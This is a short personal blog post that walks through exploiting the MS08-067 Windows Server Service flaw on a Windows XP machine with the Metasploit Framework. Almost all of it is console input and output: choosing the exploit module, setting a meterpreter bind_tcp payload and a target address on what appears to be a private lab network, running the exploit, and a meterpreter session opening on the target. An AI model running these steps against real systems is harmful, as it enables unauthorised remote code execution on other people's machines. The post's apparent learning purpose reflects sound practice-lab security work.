Exploit ms08-067 in Windows XP

Posted on by Unknown
Hi folks,
This is last post today, and the climax. LOL
After discovering vulnerability using Nessus then, I will try to exploit the windows target using Metasploit Framework.
The Vulnerability that I will try to exploit is MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)
First, I start msfconsole


then I will use exploit/windows/smb/ms08_67_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) >

after that I set the payload to windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) >

then, I will check what options I need to add
msf  exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) >

as you can see The  target address is currently empty so I will add the target address
msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf  exploit(ms08_067_netapi) >

After I check the setting options is ok, then I try to exploit
msf  exploit(ms08_067_netapi) > exploit 

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:60822 -> 192.168.56.2:4444) at 2012-12-22 01:53:58 +0700

meterpreter >

Tadaa....!! Meterpreter session opened.
Now you have the access to the target system.

note:
The target firewall is currently off

Leave a Reply